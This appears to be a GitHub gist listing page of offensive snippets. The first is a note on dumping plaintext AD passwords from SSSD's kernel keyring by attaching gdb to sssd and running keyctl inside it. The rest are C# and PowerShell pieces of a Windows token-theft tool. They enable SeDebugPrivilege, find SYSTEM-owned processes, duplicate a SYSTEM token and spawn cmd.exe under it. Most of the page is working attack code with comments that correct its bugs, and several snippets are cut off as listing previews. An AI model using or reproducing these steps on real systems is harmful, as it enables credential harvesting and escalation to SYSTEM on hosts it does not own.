shelld0n / gist:bdeff6194ec729d7d1c3ee81c317da8f
Created May 27, 2021 19:47 — forked from jeffmcjunkin/gist:d5fb8dbf15cbd5d37a77fafccda4d969
Retrieving SSSD plain text passwords (krb5_store_password_if_offline)
For whoever this interests: if `krb5_store_password_if_offline` is enabled in the SSSD configuration, the AD password of each account that authenticates is stored in plaintext in the kernel keyring. Dumping it requires attaching a debugger to the running sssd process (below), which in practice means root on the host — so this is a post-compromise credential-harvesting technique rather than a remote weakness, but it turns one compromised Linux host into reusable domain credentials. If offline logon is not actually required, leave the option at its default (off).
To dump the clear-text password, attach gdb to the SSSD process and have it run `keyctl` from inside that process, so the listing is taken from sssd's own keyring rather than the attacker's:
```
# Run from the shell: attach to the sssd daemon (needs ptrace rights over it, normally root).
gdb -p <PID_OF_SSSD>
# Run at the gdb prompt: executes keyctl inside the sssd process, so it lists that
# process's keyring. system() runs with sssd's privileges and drops the listing in /tmp,
# which is typically world-readable — remove the file afterwards.
call system("keyctl show > /tmp/output")
```
From /tmp/output, locate the key ID of the user whose password you want. Delete /tmp/output when done: it was written by the sssd process into a directory that is typically world-readable.
An example of the output is:
shelld0n / CreateProcessWithTokenW_code.cs
Created February 1, 2020 14:20
CreateProcessWithTokenW_code
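// Duplicate the captured token as a primary token and spawn cmd.exe under it.
// Assumes tokenHandle was opened with at least TOKEN_DUPLICATE (the OpenProcessToken
// block requests TOKEN_READ | TOKEN_IMPERSONATE | TOKEN_DUPLICATE).
myAPI.SECURITY_IMPERSONATION_LEVEL seImpersonateLevel = myAPI.SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation;
// CreateProcessWithTokenW needs a primary token, not an impersonation token.
myAPI.TOKEN_TYPE tokenType = myAPI.TOKEN_TYPE.TokenPrimary;
IntPtr pNewToken = IntPtr.Zero;
// NOTE(review): SECURITY_ATTRIBUTES is passed zero-initialised; Win32 expects its
// nLength member to hold the struct size — confirm against the struct definition,
// which is not part of this snippet.
myAPI.SECURITY_ATTRIBUTES sec_att = new myAPI.SECURITY_ATTRIBUTES();
if (!myAPI.DuplicateTokenEx(tokenHandle, myAPI.TOKEN_ALL_ACCESS, ref sec_att, seImpersonateLevel, tokenType, out pNewToken))
{
    // Message fixed: this call duplicates the token, it does not adjust privileges.
    Console.WriteLine("Can't duplicate access Token");
    Environment.Exit(2);
}
// NOTE(review): STARTUPINFO is also zero-initialised; the Win32 docs expect its cb
// member set to the struct size — confirm against the struct definition.
myAPI.STARTUPINFO si = new myAPI.STARTUPINFO();
myAPI.PROCESS_INFORMATION pi;
// Per the Win32 docs CreateProcessWithTokenW needs SeImpersonatePrivilege in the
// caller's token; if the shell never appears, that is the first thing to check.
bool ret = myAPI.CreateProcessWithTokenW(pNewToken, myAPI.LogonFlags.NetCredentialsOnly, "C:\\Windows\\System32\\cmd.exe", null, myAPI.CreationFlags.NewConsole, IntPtr.Zero, null, ref si, out pi);
// The original never inspected ret, so a failed spawn was indistinguishable from
// success; fail loudly like the other blocks do.
if (!ret)
{
    Console.WriteLine("CreateProcessWithTokenW failed");
    Environment.Exit(2);
}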
shelld0n / CreateProcessWithToken_definitions.cs
Created February 1, 2020 14:11
CreateProcessWithToken_definitions
// dwLogonFlags values accepted by CreateProcessWithTokenW. A single value is passed
// per call (not a [Flags] set); the numeric values match the Win32 LOGON_* constants.
public enum LogonFlags
{
    WithProfile = 1,        // LOGON_WITH_PROFILE
    NetCredentialsOnly = 2, // LOGON_NETCREDENTIALS_ONLY (explicit; was the implicit next value)
}
public enum CreationFlags
{
DefaultErrorMode = 0x04000000,
NewConsole = 0x00000010,
shelld0n / OpenProcessToken_codeblock.cs
Created February 1, 2020 13:49
OpenProcessToken_codeblock
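// Open the target (SYSTEM) process and obtain a handle to its access token in
// tokenHandle. The duplicate/spawn step lives in a later block.
Console.WriteLine("your journey just started");
// QueryInformation is enough for OpenProcessToken (per the Win32 docs). The original
// passed bInheritHandle = true, which would let any child process spawned later
// inherit this handle; nothing here needs inheritance, so pass false.
IntPtr test = myAPI.OpenProcess(myAPI.ProcessAccessFlags.QueryInformation, false, pid);
// The original only printed on failure and then called OpenProcessToken on a null
// handle; stop here instead, matching the Exit(2) convention of the sibling blocks.
if (test == IntPtr.Zero) { Console.WriteLine("No Handle to process !"); Environment.Exit(2); }
IntPtr tokenHandle;
// TOKEN_DUPLICATE is what the later DuplicateTokenEx call requires; TOKEN_READ and
// TOKEN_IMPERSONATE are requested alongside it as in the original.
bool result_token = myAPI.OpenProcessToken(test, myAPI.TOKEN_READ | myAPI.TOKEN_IMPERSONATE | myAPI.TOKEN_DUPLICATE, out tokenHandle);
Console.WriteLine(result_token);
// A false result previously went unnoticed and the bogus tokenHandle was used downstream.
if (!result_token) { Console.WriteLine("Can't open token of target process"); Environment.Exit(2); }
//End of getting the handle of token of SYSTEM process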
shelld0n / openprocess.cs
Created February 1, 2020 13:29
OpenProcess
// see http://www.pinvoke.net/default.aspx/kernel32/OpenProcess.html
[Flags]
public enum ProcessAccessFlags : uint
{
All = 0x001F0FFF,
Terminate = 0x00000001,
CreateThread = 0x00000002,
VirtualMemoryOperation = 0x00000008,
VirtualMemoryRead = 0x00000010,
VirtualMemoryWrite = 0x00000020,
shelld0n / API_imports.cs
Last active February 1, 2020 13:27
API_imports
// see https://www.pinvoke.net/default.aspx/advapi32.openprocesstoken
// Token access-right bits as listed on pinvoke.net (link above). OR them together
// for the DesiredAccess argument of OpenProcessToken / DuplicateTokenEx; request
// only what the following calls need (e.g. TOKEN_DUPLICATE for DuplicateTokenEx).
public const uint STANDARD_RIGHTS_REQUIRED = 0x000F0000; // generic standard-rights mask
public const uint STANDARD_RIGHTS_READ     = 0x00020000; // READ_CONTROL
public const uint TOKEN_ASSIGN_PRIMARY     = 0x0001;     // attach as a primary token
public const uint TOKEN_DUPLICATE          = 0x0002;     // needed by DuplicateTokenEx
public const uint TOKEN_IMPERSONATE        = 0x0004;     // attach as impersonation token
public const uint TOKEN_QUERY              = 0x0008;     // read token contents
public const uint TOKEN_QUERY_SOURCE       = 0x0010;     // read token source
public const uint TOKEN_ADJUST_PRIVILEGES  = 0x0020;     // needed by AdjustTokenPrivileges
public const uint TOKEN_ADJUST_GROUPS      = 0x0040;     // change group attributes
shelld0n / AdjustTokenPrivileges_codeblock.cs
Created February 1, 2020 12:34
adjusttokenpriv_block
// Enable SeDebugPrivilege Routine
// Builds the TOKEN_PRIVILEGES structure (tp) that enables SeDebugPrivilege in the
// current process token, so the later OpenProcess on a SYSTEM-owned process can succeed.
// Per the Win32 docs AdjustTokenPrivileges can only enable privileges the token already
// holds in a disabled state; it cannot grant new ones, so this must run from a context
// that already has SeDebugPrivilege (typically an elevated administrator) — NOTE(review):
// confirm that assumption for the intended target.
string Privilege = "SeDebugPrivilege";
myAPI.LUID luid = new myAPI.LUID();
// Pseudo-handle for the current process (per the Win32 docs it needs no CloseHandle).
IntPtr hProcess = myAPI.GetCurrentProcess();
IntPtr hToken;
// TOKEN_ADJUST_PRIVILEGES is required by AdjustTokenPrivileges; TOKEN_QUERY is added so the
// call can report the previous state. Exit(2) on failure is the convention used across these blocks.
if (!myAPI.OpenProcessToken(hProcess, myAPI.TOKEN_QUERY | myAPI.TOKEN_ADJUST_PRIVILEGES, out hToken)) { Console.WriteLine("No tokens for current process"); Environment.Exit(2); };
// Resolve the privilege name to its LUID on the local machine (null system name).
// A failure here means the name could not be looked up, not that the privilege is absent.
if (!myAPI.LookupPrivilegeValue(null, Privilege, out luid)) { Console.WriteLine("No handle for privilege"); Environment.Exit(2); };
// SE_PRIVILEGE_ENABLED: turn the privilege on (as opposed to removing it).
myAPI.LUID_AND_ATTRIBUTES luAttr = new myAPI.LUID_AND_ATTRIBUTES { Luid = luid, Attributes = myAPI.LUID_AND_ATTRIBUTES.SE_PRIVILEGE_ENABLED };
// Exactly one privilege is adjusted. NOTE(review): TOKEN_PRIVILEGES.Privileges is an array;
// its P/Invoke definition (not in this snippet) must marshal it inline for the native call to work.
myAPI.TOKEN_PRIVILEGES tp = new myAPI.TOKEN_PRIVILEGES { PrivilegeCount = 1, Privileges = new myAPI.LUID_AND_ATTRIBUTES[1] };
tp.Privileges[0] = luAttr;
// The AdjustTokenPrivileges call that applies tp to hToken is outside this snippet.
shelld0n / AdjustTokenPrivileges.cs
Last active January 31, 2020 22:24
Adjust Token
// Luid Structure Definition
// LUID (locally unique identifier) as returned by LookupPrivilegeValue and embedded in
// LUID_AND_ATTRIBUTES. Sequential layout so it marshals as the 8-byte native struct:
// an unsigned 32-bit low part followed by a signed 32-bit high part.
[StructLayout(LayoutKind.Sequential)]
public struct LUID
{
    public uint LowPart;
    public int HighPart;
}
[StructLayout(LayoutKind.Sequential)]
public struct LUID_AND_ATTRIBUTES
shelld0n / get_pid.ps1
Created January 31, 2020 21:27
get PID of system process
# List processes owned by SYSTEM with name, PID and handle count, to pick a target PID.
# NOTE: -IncludeUserName is documented as requiring an elevated shell — confirm on the target.
# The '*SYSTEM*' wildcard is loose: it also matches any account whose name merely contains
# "SYSTEM", so check the UserName column before trusting a PID from this list.
Get-Process -IncludeUserName |
    Where-Object UserName -Like '*SYSTEM*' |
    Select-Object -Property ProcessName, Id, Handles
shelld0n / SYSTEM.cs
Last active December 30, 2019 15:54
SYSTEM Draft
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Runtime.InteropServices;
namespace Token
{
class Program